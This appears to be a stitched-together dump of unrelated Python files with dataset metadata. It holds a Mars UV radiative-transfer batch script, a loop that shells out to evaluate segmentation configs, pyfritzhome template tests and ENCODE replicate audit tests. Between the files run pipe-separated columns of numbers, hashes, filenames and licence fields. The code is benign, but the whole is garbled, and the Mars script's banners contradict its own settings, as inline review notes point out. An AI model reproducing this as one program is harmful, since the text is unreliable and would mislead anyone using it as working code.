    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_h2ocloudod='+cloudtaulabel+'_z=3.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=True,h2ocloudlayerinds=np.array([60]), h2ocloudlayerods=np.array([cloudtauvalue]),h2oiceparamsfile='cloud_h2o_reff10_vareff0p1_lognormal.pickle')
    ##CO2 Clouds
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
#########################################################################################################################
###CO2-H2O-SO2/H2S atmospheres. No particulate, no TDXC, no delta-scaling, T_0=250, pCO2=0.02-2bar, SZA=0, A=fresh snow
#########################################################################################################################
# NOTE(review): the banner above says A=fresh snow, but outputfilelabel and the
# nonuniformalbedo array below match the A=desert setting used elsewhere -- confirm.
#################
###SO2 (pSO2=2e-9 -- 2e-5 bar for pCO2=2e-2-2 bar)
#################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_100ppbso2_0h2s', 'volcanicmars_0.02bar_250K_1ppmso2_0h2s', 'volcanicmars_0.02bar_250K_10ppmso2_0h2s', 'volcanicmars_0.02bar_250K_100ppmso2_0h2s', 'volcanicmars_0.02bar_250K_1000ppmso2_0h2s','volcanicmars_0.2bar_250K_10ppbso2_0h2s', 'volcanicmars_0.2bar_250K_100ppbso2_0h2s', 'volcanicmars_0.2bar_250K_1ppmso2_0h2s', 'volcanicmars_0.2bar_250K_10ppmso2_0h2s', 'volcanicmars_0.2bar_250K_100ppmso2_0h2s','volcanicmars_2bar_250K_1ppbso2_0h2s', 'volcanicmars_2bar_250K_10ppbso2_0h2s', 'volcanicmars_2bar_250K_100ppbso2_0h2s', 'volcanicmars_2bar_250K_1ppmso2_0h2s', 'volcanicmars_2bar_250K_10ppmso2_0h2s'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=False)
#################
###H2S (pH2S=2e-9 -- 2e-4 bar for pCO2=2e-2-2 bar)
#################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_0so2_100ppbh2s', 'volcanicmars_0.02bar_250K_0so2_1ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10ppmh2s', 'volcanicmars_0.02bar_250K_0so2_100ppmh2s', 'volcanicmars_0.02bar_250K_0so2_1000ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10000ppmh2s', 'volcanicmars_0.2bar_250K_0so2_10ppbh2s', 'volcanicmars_0.2bar_250K_0so2_100ppbh2s', 'volcanicmars_0.2bar_250K_0so2_1ppmh2s', 'volcanicmars_0.2bar_250K_0so2_10ppmh2s', 'volcanicmars_0.2bar_250K_0so2_100ppmh2s', 'volcanicmars_0.2bar_250K_0so2_1000ppmh2s', 'volcanicmars_2bar_250K_0so2_1ppbh2s', 'volcanicmars_2bar_250K_0so2_10ppbh2s', 'volcanicmars_2bar_250K_0so2_100ppbh2s', 'volcanicmars_2bar_250K_0so2_1ppmh2s', 'volcanicmars_2bar_250K_0so2_10ppmh2s', 'volcanicmars_2bar_250K_0so2_100ppmh2s'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=False)
#########################################################################################################################
###CO2-H2O-SO2/H2S atmospheres. CO2 clouds @ 20-21 km (variable thickness), no TDXC, no delta-scaling, T_0=250, P_0=0.02, SZA=0, A=fresh snow
#########################################################################################################################
# NOTE(review): banner says A=fresh snow; labels/albedo below again indicate A=desert -- confirm.
##################
####SO2 (pSO2=2e-9 -- 2e-5 bar for pCO2=2e-2 bar, CO2 cloud OD=1-1000)
##################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_100ppbso2_0h2s', 'volcanicmars_0.02bar_250K_1ppmso2_0h2s', 'volcanicmars_0.02bar_250K_10ppmso2_0h2s', 'volcanicmars_0.02bar_250K_100ppmso2_0h2s', 'volcanicmars_0.02bar_250K_1000ppmso2_0h2s'])
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    for ind in range(0, len(cloudtaulabel_list)):
        cloudtaulabel=cloudtaulabel_list[ind]
        cloudtauvalue=cloudtauvalue_list[ind]
        rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
##################
####H2S (pSO2=2e-9 -- 2e-4 bar for pCO2=2e-2 bar, CO2 cloud OD=1-1000)
##################
inputatmofilelabel_elt_list=np.array(['volcanicmars_0.02bar_250K_0so2_100ppbh2s', 'volcanicmars_0.02bar_250K_0so2_1ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10ppmh2s', 'volcanicmars_0.02bar_250K_0so2_100ppmh2s', 'volcanicmars_0.02bar_250K_0so2_1000ppmh2s', 'volcanicmars_0.02bar_250K_0so2_10000ppmh2s'])
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    for ind in range(0, len(cloudtaulabel_list)):
        cloudtaulabel=cloudtaulabel_list[ind]
        cloudtauvalue=cloudtauvalue_list[ind]
        rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle')
#########################################################################################################################
###CO2-H2O atmospheres. Varying levels of exponentially distributed dust, no TDXC, no delta-scaling, T_0=250, P_0=0.02, SZA=0, A=fresh snow
#########################################################################################################################
##################
####Just dust (tau_d=0.01-10, pCO2=2e-2--2 bar)
##################
inputatmofilelabel_elt_list=np.array(['colddrymars_0.02bar_250K','colddrymars_0.2bar_250K','colddrymars_2bar_250K'])
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    for ind in range(0, len(dusttaulabel_list)):
        dusttaulabel=dusttaulabel_list[ind]
        dusttauvalue=dusttauvalue_list[ind]
        rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel, inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=False, includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
##################
####Dust and clouds (Varying tau_d and tau_cloud)
##################
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
cloudtaulabel_list=np.array(['1', '10', '100', '1000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([1., 10., 100., 1000.]) #list of cloud optical depths (500 nm)
for ind_dust in range(0, len(dusttaulabel_list)):
    for ind_cloud in range(0, len(cloudtaulabel_list)):
        dusttaulabel=dusttaulabel_list[ind_dust]
        dusttauvalue=dusttauvalue_list[ind_dust]
        cloudtaulabel=cloudtaulabel_list[ind_cloud]
        cloudtauvalue=cloudtauvalue_list[ind_cloud]
        rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel+'_co2cloudod='+cloudtaulabel+'_z=20.5_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([43]), co2cloudlayerods=np.array([cloudtauvalue]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle', includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
##################
####Dust and clouds (varying tau_d and cloud position)
##################
dusttaulabel_list=np.array(['0.1', '1', '10']) #list of total dust optical depths (500 nm)
dusttauvalue_list=np.array([0.1, 1., 10.]) #list of total dust optical depths (500 nm)
cloudpositionslabel_list=np.array(['0.5', '20.5', '40.5']) #list of cloud altitudes (km)
cloudindexvalue_list=np.array([63, 43, 23]) #indices corresponding to those cloud altitudes
for ind_dust in range(0, len(dusttaulabel_list)):
    for ind_cloud in range(0, len(cloudpositionslabel_list)):
        dusttaulabel=dusttaulabel_list[ind_dust]
        dusttauvalue=dusttauvalue_list[ind_dust]
        cloudpositionslabel=cloudpositionslabel_list[ind_cloud]
        cloudindexvalue=cloudindexvalue_list[ind_cloud]
        rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='colddrymars_0.02bar_250K', outputfilelabel='z=0_A=desert_noTD_DS_dustod='+dusttaulabel+'_co2cloudod=100_z='+cloudpositionslabel+'_reff=10', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=True, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includeh2ocloud=False,includeco2cloud=True,co2cloudlayerinds=np.array([cloudindexvalue]), co2cloudlayerods=np.array([100.]),co2iceparamsfile='cloud_co2_reff10_vareff0p1_lognormal.pickle', includedust=True,tau_d=dusttauvalue,dustparamsfile='dust_wolff_pangajello_reff1p5_vareff0p5_lognormal.pickle')
| 90.77095
| 797
| 0.730244
| 2,070
| 16,248
| 5.456522
| 0.11256
| 0.029748
| 0.02479
| 0.042851
| 0.845064
| 0.779371
| 0.772466
| 0.753431
| 0.745374
| 0.726605
| 0
| 0.081209
| 0.053422
| 16,248
| 178
| 798
| 91.280899
| 0.653186
| 0.186915
| 0
| 0.571429
| 1
| 0
| 0.340792
| 0.306487
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042857
| 0
| 0.042857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8846485d7496b50877c22a79df52aca65d4286
| 580
|
py
|
Python
|
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_covid20cases_timm-regnetx_002_ElasticTransform.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# Shell out to main.py once per cross-validation fold (0-4), evaluating the
# covid20cases / unetplusplus / timm-regnetx_002 / ElasticTransform configs.
ls = [
    f"python main.py --configs configs/eval_covid20cases_unetplusplus_timm-regnetx_002_{fold}_ElasticTransform.yml"
    for fold in range(5)
]
for command in ls:
    os.system(command)
| 52.727273
| 110
| 0.856897
| 80
| 580
| 5.8375
| 0.3
| 0.107066
| 0.12848
| 0.203426
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0.890792
| 0
| 0.054645
| 0.053448
| 580
| 11
| 111
| 52.727273
| 0.795993
| 0
| 0
| 0
| 0
| 0
| 0.886403
| 0.671256
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eba33faac807b8deddf2ba0e0ac4c8fe96fbf9a6
| 5,345
|
py
|
Python
|
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
tests/test_handler.py
|
delta-accelerator/channel_access.server
|
21a7707da1f3421ed38773095e577f48b798daac
|
[
"MIT"
] | null | null | null |
import pytest
import threading
import channel_access.common as ca
import channel_access.server as cas
from . import common
def test_write_handler(server):
    """A write handler returning (value, timestamp) accepts and stores the write."""
    was_called = False

    def on_write(pv, value, timestamp, context):
        nonlocal was_called
        was_called = True
        return (value, timestamp)

    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=on_write)
    common.caput('CAS:Test', 1)
    assert was_called
    assert pv.value == 1
def test_noop_write_handler(server):
    """A write handler returning True lets the written value through unchanged."""
    was_called = False

    def on_write(pv, value, timestamp, context):
        nonlocal was_called
        was_called = True
        return True

    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=on_write)
    common.caput('CAS:Test', 1)
    assert was_called
    assert pv.value == 1
def test_changing_write_handler(server):
    """A write handler may substitute a different value than the one written."""
    was_called = False

    def on_write(pv, value, timestamp, context):
        nonlocal was_called
        was_called = True
        # Store value + 1 instead of the value the client wrote.
        return (value + 1, timestamp)

    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=on_write)
    common.caput('CAS:Test', 1)
    assert was_called
    assert pv.value == 2
def test_failing_write_handler(server):
    """The built-in cas.failing_write_handler rejects every write attempt."""
    handler = cas.failing_write_handler
    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=handler)
    with pytest.raises(common.CaputError):
        common.caput('CAS:Test', 1)
def test_async_write_handler(server):
    """An AsyncWrite completed later still delivers the written value."""
    was_called = False
    pending = None
    saved_args = None

    def on_write(pv, value, timestamp, context):
        nonlocal was_called, pending, saved_args
        was_called = True
        pending = cas.AsyncWrite(pv, context)
        saved_args = (value, timestamp)
        return pending

    def finish():
        # Complete the deferred write with the originally written value.
        pending.complete(*saved_args)

    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=on_write)
    timer = threading.Timer(1.0, finish)
    timer.start()
    common.caput('CAS:Test', 1, timeout=2)
    assert was_called
    timer.join()
    assert pv.value == 1
def test_failing_async_write_handler(server):
    """Failing an AsyncWrite later propagates an error to the caput client."""
    was_called = False
    pending = None

    def on_write(pv, value, timestamp, context):
        nonlocal was_called, pending
        was_called = True
        pending = cas.AsyncWrite(pv, context)
        return pending

    def finish():
        # Reject the deferred write.
        pending.fail()

    pv = server.createPV('CAS:Test', ca.Type.CHAR, write_handler=on_write)
    timer = threading.Timer(1.0, finish)
    timer.start()
    with pytest.raises(common.CaputError):
        common.caput('CAS:Test', 1, timeout=2)
    assert was_called
    timer.join()
    assert pv.value == 0
def test_read_handler(server):
    """A read handler returning pv.attributes serves the stored value."""
    was_called = False

    def on_read(pv, context):
        nonlocal was_called
        was_called = True
        return pv.attributes

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=on_read,
                         attributes={'value': 1})
    value = int(common.caget('CAS:Test'))
    assert was_called
    assert value == 1
def test_noop_read_handler(server):
    """A read handler returning True serves the stored value unchanged."""
    was_called = False

    def on_read(pv, context):
        nonlocal was_called
        was_called = True
        return True

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=on_read,
                         attributes={'value': 1})
    value = int(common.caget('CAS:Test'))
    assert was_called
    assert value == 1
def test_changing_read_handler(server):
    """A read handler may serve different attributes than those stored."""
    was_called = False

    def on_read(pv, context):
        nonlocal was_called
        was_called = True
        # Override the stored value in the attributes returned to the client.
        current = pv.attributes
        current.update({ 'value': 2 })
        return current

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=on_read,
                         attributes={'value': 1})
    value = int(common.caget('CAS:Test'))
    assert was_called
    assert value == 2
def test_failing_read_handler(server):
    """A read handler returning False makes the caget attempt fail."""
    was_called = False

    def on_read(pv, context):
        nonlocal was_called
        was_called = True
        return False

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=on_read,
                         attributes={'value': 1})
    with pytest.raises(common.CagetError):
        common.caget('CAS:Test')
    assert was_called
def test_async_read_handler(server):
    """An AsyncRead completed later still serves a value to the client."""
    was_called = False
    pending = None

    def on_read(pv, context):
        nonlocal was_called, pending
        was_called = True
        pending = cas.AsyncRead(pv, context)
        return pending

    def finish():
        # Complete the deferred read with a concrete value.
        pending.complete({'value': 1})

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=on_read)
    timer = threading.Timer(1.0, finish)
    timer.start()
    common.caget('CAS:Test', timeout=2)
    assert was_called
    timer.join()
    assert pv.value == 1
def test_failing_async_read_handler(server):
    """Failing a deferred cas.AsyncRead completion must make caget raise
    CagetError."""
    state = {'executed': False, 'completion': None}

    def handler(pv, context):
        state['executed'] = True
        state['completion'] = cas.AsyncRead(pv, context)
        return state['completion']

    def fail_later():
        state['completion'].fail()

    pv = server.createPV('CAS:Test', ca.Type.CHAR, read_handler=handler)
    failer = threading.Timer(1.0, fail_later)
    failer.start()
    with pytest.raises(common.CagetError):
        common.caget('CAS:Test', timeout=2)
    assert state['executed']
    failer.join()
| 26.859296
| 91
| 0.647521
| 640
| 5,345
| 5.326563
| 0.089063
| 0.049281
| 0.056322
| 0.066882
| 0.912878
| 0.897037
| 0.87973
| 0.86389
| 0.840422
| 0.812262
| 0
| 0.008376
| 0.240599
| 5,345
| 198
| 92
| 26.994949
| 0.831486
| 0
| 0
| 0.786585
| 0
| 0
| 0.041534
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 1
| 0.164634
| false
| 0
| 0.030488
| 0
| 0.262195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ccd97ab53b81dc4d98a325c48720219d74417d70
| 6,834
|
py
|
Python
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 33
|
2017-10-25T20:13:35.000Z
|
2022-03-27T09:21:19.000Z
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 49
|
2017-11-05T05:52:45.000Z
|
2022-03-27T09:21:04.000Z
|
tests/test_fritzhometemplate.py
|
mib1185/python-fritzhome
|
c0017738b365b4dea5a54d01add66fd606229cd2
|
[
"MIT"
] | 33
|
2018-05-05T21:52:08.000Z
|
2022-03-27T08:24:00.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import eq_, assert_true, assert_false
from unittest.mock import MagicMock
from .helper import Helper
from pyfritzhome import Fritzhome
class TestFritzhomeTemplate(object):
    """Tests for Fritzhome template parsing and apply-flag decoding.

    Each test fetches a template by AIN from a canned template-list
    response and checks which of the boolean ``apply_*`` properties are
    set for that template's function bitmask.
    """

    # Every boolean apply_* flag a template exposes; used by the helper
    # below to assert exactly one (or none) of them is set.
    APPLY_FLAGS = (
        "apply_hkr_summer",
        "apply_hkr_temperature",
        "apply_hkr_holidays",
        "apply_hkr_time_table",
        "apply_relay_manual",
        "apply_relay_automatic",
        "apply_level",
        "apply_color",
        "apply_dialhelper",
    )

    def setup(self):
        """Build a Fritzhome whose HTTP layer is mocked with a canned
        template-list response, then load the templates from it."""
        self.mock = MagicMock()
        self.fritz = Fritzhome("10.0.0.1", "user", "pass")
        self.fritz._request = self.mock
        self.fritz._devices = {}
        self.mock.side_effect = [Helper.response("templates/template_list")]
        self.fritz.update_templates()

    def _assert_applies_only(self, template, expected_flag=None):
        """Assert that exactly *expected_flag* is True on *template* and all
        other apply_* flags are False (all False when expected_flag is None)."""
        for flag in self.APPLY_FLAGS:
            if flag == expected_flag:
                assert_true(getattr(template, flag))
            else:
                assert_false(getattr(template, flag))

    def test_template_init(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B0650682")
        eq_(template.ain, "tmp0B32F7-1B0650682")
        eq_(template._functionsbitmask, 320)
        self._assert_applies_only(template, None)

    def test_template_with_single_device(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B0650234")
        eq_(template.devices, ["08735 0525249"])

    def test_template_with_multiple_devices(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1C40A2B8A")
        # NOTE: the original fixture listed "08735 0525249" twice; since the
        # expectation is a set, the duplicate was redundant and is dropped.
        expected_devices = {"08735 0525249",
                            "08735 0340143",
                            "08735 0526125"}
        eq_(len(expected_devices.intersection(template.devices)),
            len(expected_devices))

    def test_template_applies_hkr_summer(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA20")
        self._assert_applies_only(template, "apply_hkr_summer")

    def test_template_applies_hkr_temperature(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA21")
        self._assert_applies_only(template, "apply_hkr_temperature")

    def test_template_applies_hkr_holidays(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA22")
        self._assert_applies_only(template, "apply_hkr_holidays")

    def test_template_applies_hkr_time_table(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA23")
        self._assert_applies_only(template, "apply_hkr_time_table")

    def test_template_applies_relay_manual(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA24")
        self._assert_applies_only(template, "apply_relay_manual")

    def test_template_applies_relay_automatic(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA25")
        self._assert_applies_only(template, "apply_relay_automatic")

    def test_template_applies_level(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA26")
        self._assert_applies_only(template, "apply_level")

    def test_template_applies_color(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA27")
        self._assert_applies_only(template, "apply_color")

    def test_template_applies_dialhelper(self):
        template = self.fritz.get_template_by_ain("tmp0B32F7-1B064FA28")
        self._assert_applies_only(template, "apply_dialhelper")
| 40.678571
| 88
| 0.734416
| 811
| 6,834
| 5.762022
| 0.108508
| 0.250374
| 0.329339
| 0.416007
| 0.826664
| 0.804194
| 0.804194
| 0.795848
| 0.795848
| 0.677723
| 0
| 0.036856
| 0.190079
| 6,834
| 167
| 89
| 40.922156
| 0.807407
| 0.006146
| 0
| 0.604478
| 0
| 0
| 0.051694
| 0.003387
| 0
| 0
| 0
| 0
| 0.679104
| 1
| 0.097015
| false
| 0.007463
| 0.029851
| 0
| 0.134328
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ccdde8ac40fc96cfc99a746ebf4348c6e42984e0
| 2,496
|
py
|
Python
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 102
|
2015-05-20T01:17:43.000Z
|
2022-03-07T06:03:55.000Z
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 901
|
2015-01-07T23:11:57.000Z
|
2022-03-18T13:56:12.000Z
|
src/encoded/tests/test_audit_replicate.py
|
procha2/encoded
|
e9f122362b71f3b8641023b8d2d5ad531d3484b7
|
[
"MIT"
] | 65
|
2015-02-06T23:00:26.000Z
|
2022-01-22T07:58:44.000Z
|
import pytest
def test_audit_status_replicate(testapp, rep1):
    """The replicate's index-data must contain a 'mismatched status' audit."""
    audits = testapp.get(rep1['@id'] + '@@index-data').json['audit']
    flattened = [err for errs in audits.values() for err in errs]
    assert any(err['category'] == 'mismatched status' for err in flattened)
def test_audit_inconsistent_modification_tag(
        testapp, rep1,
        experiment, antibody_lot, target_H3K27ac,
        target, base_biosample, construct_genetic_modification,
        library_1):
    """A ChIP-seq replicate whose antibody target tag does not match the
    biosample's genetic modification must be flagged with an
    'inconsistent modification tag' audit."""
    testapp.patch_json(experiment['@id'], {
        'assay_term_name': 'ChIP-seq',
        'target': target_H3K27ac['@id'],
    })
    testapp.put_json(target['@id'], {
        'investigated_as': ['synthetic tag'],
        'label': 'FLAG',
    })
    testapp.patch_json(rep1['@id'], {
        'antibody': antibody_lot['@id'],
        'library': library_1['@id'],
    })
    testapp.patch_json(base_biosample['@id'], {
        'genetic_modifications': [construct_genetic_modification['@id']],
    })
    audits = testapp.get(rep1['@id'] + '@@index-data').json['audit']
    flattened = [err for errs in audits.values() for err in errs]
    assert any(err['category'] == 'inconsistent modification tag'
               for err in flattened)
def test_audit_consistent_modification_tag(
        testapp, rep1,
        experiment, antibody_lot,
        target, base_biosample, construct_genetic_modification,
        library_1):
    """When the modification's introduced FLAG tag matches the antibody
    target, no 'inconsistent modification tag' audit may be raised."""
    testapp.patch_json(experiment['@id'], {
        'assay_term_name': 'ChIP-seq',
        'target': target['@id'],
    })
    testapp.put_json(target['@id'], {
        'investigated_as': ['synthetic tag'],
        'label': 'FLAG',
    })
    testapp.patch_json(rep1['@id'], {
        'antibody': antibody_lot['@id'],
        'library': library_1['@id'],
    })
    testapp.patch_json(
        construct_genetic_modification['@id'],
        {'introduced_tags': [{'name': 'FLAG', 'location': 'C-terminal'}]})
    testapp.patch_json(base_biosample['@id'], {
        'genetic_modifications': [construct_genetic_modification['@id']],
    })
    audits = testapp.get(rep1['@id'] + '@@index-data').json['audit']
    flattened = [err for errs in audits.values() for err in errs]
    assert all(err['category'] != 'inconsistent modification tag'
               for err in flattened)
| 44.571429
| 93
| 0.604968
| 269
| 2,496
| 5.360595
| 0.223048
| 0.062413
| 0.07767
| 0.035368
| 0.879334
| 0.879334
| 0.879334
| 0.879334
| 0.779473
| 0.779473
| 0
| 0.009559
| 0.245593
| 2,496
| 55
| 94
| 45.381818
| 0.75624
| 0
| 0
| 0.729167
| 0
| 0
| 0.182292
| 0.016827
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.0625
| false
| 0
| 0.020833
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
